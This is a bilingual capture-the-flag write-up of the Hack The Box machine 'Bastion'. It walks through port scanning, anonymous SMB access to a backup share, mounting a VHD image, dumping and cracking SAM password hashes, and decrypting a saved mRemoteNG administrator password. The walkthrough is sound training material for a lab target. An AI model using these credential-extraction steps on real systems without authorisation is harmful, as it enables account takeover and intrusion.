Hack the box: Bastion

• 2019 年 11 月 28 日
• 筆記

介紹

目標：10.10.10.134 (Windows)

Kali：10.10.16.65

In conclusion, Bastion is not a medium box. But it would be easier to solve this box with windows VM. Command VM may be a good choice. But it can be finished by kali.

總的來說，Bastion 其實並不是一個特別簡單的機器。如果使用 windows 可以更方便地解決這台靶機。Command VM 對於這台靶機其實挺不錯的，不過我們也可以使用 kali 來完成這個靶機。

資訊枚舉

Firstly, detect the open ports:

首先，探測開放埠

# Nmap 7.70 scan initiated Sun May 5 12:33:32 2019 as: nmap -sT -p- --min-rate 10000 -oN ports 10.10.10.134  Warning: 10.10.10.134 giving up on port because retransmission cap hit (10).  Nmap scan report for 10.10.10.134  Host is up (0.33s latency).  Not shown: 60653 closed ports, 4873 filtered ports  PORT STATE SERVICE  22/tcp open ssh  135/tcp open msrpc  139/tcp open netbios-ssn  445/tcp open microsoft-ds  49664/tcp open unknown  49665/tcp open unknown  49667/tcp open unknown  49668/tcp open unknown  49670/tcp open unknown

From the open ports, it can be induced that the box may be a windows machine that opens ssh service. Then try to obtain the detailed services of these open ports:

從上面開放的埠，我們可以推導出這是一台開放了 ssh 服務的 windows 機器。接著嘗試獲取這些開放埠對應的服務：

# Nmap 7.70 scan initiated Sun May 5 12:29:46 2019 as: nmap -A -oN services 10.10.10.134  Nmap scan report for 10.10.10.134  Host is up (0.53s latency).  Not shown: 996 closed ports  PORT STATE SERVICE VERSION  22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)  | ssh-hostkey:  | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)  | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)  |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)  135/tcp open msrpc Microsoft Windows RPC  139/tcp open netbios-ssn Microsoft Windows netbios-ssn  445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds  No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  TCP/IP fingerprint:  OS:SCAN(V=7.70%E=4%D=5/5%OT=22%CT=1%CU=37821%PV=Y%DS=2%DC=T%G=Y%TM=5CCED772  OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F4%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=A)  OS:SEQ(SP=F3%GCD=1%ISR=10A%TI=I%CI=I%TS=A)OPS(O1=M54BNW8ST11%O2=M54BNW8ST11  OS:%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W1=2000%W  OS:2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54BNW  OS:8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0  OS:%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4  OS:(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%  OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%  OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%R  OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)    Network Distance: 2 hops  Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows    Host script results:  |_clock-skew: mean: -43m13s, deviation: 1h09m14s, median: -3m15s  | smb-os-discovery:  | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)  | Computer name: Bastion  | NetBIOS computer name: BASTIONx00  | Workgroup: WORKGROUPx00  |_ System time: 2019-05-05T14:27:12+02:00  | smb-security-mode:  | account_used: guest  | authent

利用

There seem to be nothing special. For a normal box, http service will be the starting. For this box, we should try smb service for port 445. For smb service exploitation in kali, we choose to use smbmap, smbclient, enum4linux, etc. Let's try smbclient:

上面的資訊看起來並沒有什麼特別的。一般的靶機，http 服務往往都是突破口。對於這個靶機，我們應該注意到開放在 445 埠的 smb 服務（445 埠往往也是 windows 機器的突破口）。在 kali 上進行 smb 服務的探測，我們可以選擇使用 smbmap, smbclient, enum4linux 等。我們先來試一下 smbclient：

smbclient -L 10.10.10.134

With smbclient, we can see the smb shares of this box without any password. Try to access the share by smbclient//10.10.10.134/sharename. But the three shares cannot be accessed except Backups.

通過 smbclient，我們可以在不使用密碼的情況下看到這台靶機的共享。通過 smbclient//10.10.10.134/sharename 來嘗試訪問共享路徑，我們發現只有 Backups 是可以訪問的。

Access to the share of Backups: smbclient//10.10.10.134/Backups:

訪問共享 Backups: smbclient//10.10.10.134/Backups：

There is a note.txt in the share:

從共享路徑可以發現一個 note.txt 文件。

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

It does is a hint for something useful in the exploitation. It is inconvenient to access files by smbclient, as you cannot browse the file directly. So try to mount the shared folder to kali:

對於這個利用過程，這個提示還是有用的。通過 smbclient 來訪問文件不太方便，因為我們不能夠直接瀏覽文件。所以將這個共享文件夾掛載到 kali 上：

mount -t cifs //10.10.10.134/Backups -o user=guest,password= /mnt/backups

Here, we can access the files directly. It may be a backup folder. After some exploration, we have found some interesting files.

這樣我們就可以直接訪問文件了。這個可能是一個備份文件夾。在一些嘗試之後，我們發現了一些有趣的文件。

VHD(virtual hard disk) files seem to be very interesting. According to the wiki, VHDisa file format which represents avirtualhard disk drive(HDD).Itmay contain whatisfound on a physical HDD,suchasdisk partitionsanda file system,whichinturn can contain filesandfolders.Itistypically usedasthe hard disk of avirtualmachine. So we may find more interesting contents in the VHD files. There are two vhd files, one is 37M, and the other is 5.1 G. The larger one seems to be attractive to us. But it will be inconvenient to download the whole vhd file. According to the discussions in the forum, the author has said that you don't have to download the vhd file. Try to mount the vhd file to kai:

VHD(虛擬硬碟)文件看起來很有用。根據維基百科， VVHD是表示虛擬硬碟驅動器（HDD）的文件格式。它可能包含物理HDD上的內容，例如磁碟分區和文件系統，而後者又可以包含文件和文件夾。它通常用作虛擬機的硬碟。所以這個 VHD 文件裡面可能包含了更有用的資訊。這裡面有 2 個 VHD 文件，一個是 37M，一個是 5.1G。毫無疑問，這個大的可能更有用。但是要把整個 VHD 文件下載下來實在是太困難了，尤其是在這樣的網路下。而且靶機的作者也在論壇裡面說過你根本不需要將整個 VHD 文件下載下來。那就將 VHD 文件掛載到 kali：

guestmount --add /mnt/backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd

The operation may cost some time if the network is not very stable. Then, the vhd file in mounted successfully. It seems to be an OS disk. There seem nothing special. Security Account Manager(SAM) is the database file in Windows which stores user passwords. Try to access the SAM files, samdump2 can be utilized to dump the hash.

在網路不是很穩定的情況下這個操作還是蠻耗時的。接著，這個 VHD 文件就掛載成功了。這應該是一個系統硬碟，沒有什麼特別的資訊。但是我們可以在裡面發現一個 SAM 文件。安全帳戶管理器（SAM）是 Windows 中用於存儲用戶密碼的資料庫文件。嘗試訪問 SAM 文件， samdump2 可以將哈希導出。

From the dumped hash, the hash of L4mpje seems to be useful. We can access HashKiller to crack the hash.

從上面導出的哈希，L4mpje 的哈希看起來很有用。我們可以使用在線哈希破解網站 HashKiller 來破解哈希。

We cracked it! As we know the box opens ssh service, so try to access ssh with the user of L4mpje. Of course, we are in.

很容易我們就破解了這個哈希。而且據我們一開始獲取的資訊，這台靶機是開放了 ssh 服務的，所以我們嘗試使用 L4mpje 作為用戶名來登錄。很幸運，我們進來了。

Privilege escalation·

提權

After login with user L4mpje, we find that we have relatively limited permission. PrivEsc is often vulnerable to some specific software vulnerability. It is significant to see the program files of the box.

在使用 L4mpje 用戶登錄成功後，我們發現我們的許可權很有限。一般提權可以利用某些軟體的漏洞來完成。所以，探測這個靶機安裝了哪些軟體很有意義。

We can find an interesting folder mRemoteNG. It is an open source remote connections management tool. But there is a problem that the connections user information can be obtained by the config files. For this box, someone has created a tool to crack the password in this config file. The config file is store is the AppData folder.

我們發現了一個有趣的文件夾 mRemoteNG。它是一個開源的遠程連接管理工具。它曾經有一個漏洞，可以通過配置文件獲取用戶的連接資訊。對於這台靶機，已經有人創建了一個工具來破解這個配置文件中的密碼。配置文件存儲在 AppData 文件夾中。

It seems that the password of Administrator is stored in the XML file. Someone has created mremoteng-decrypt to crack the password. It is so convenient thanks to his awesome work.

看起來 Administrator 的密碼存儲在 XML 文件中。我們可以利用 mremoteng-decrypt 這個工具來破解密碼。

java -jar decipher_mremoteng.jar "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Wow, we get the password of Administrator.

最終，我們獲取了 Administrator 的密碼。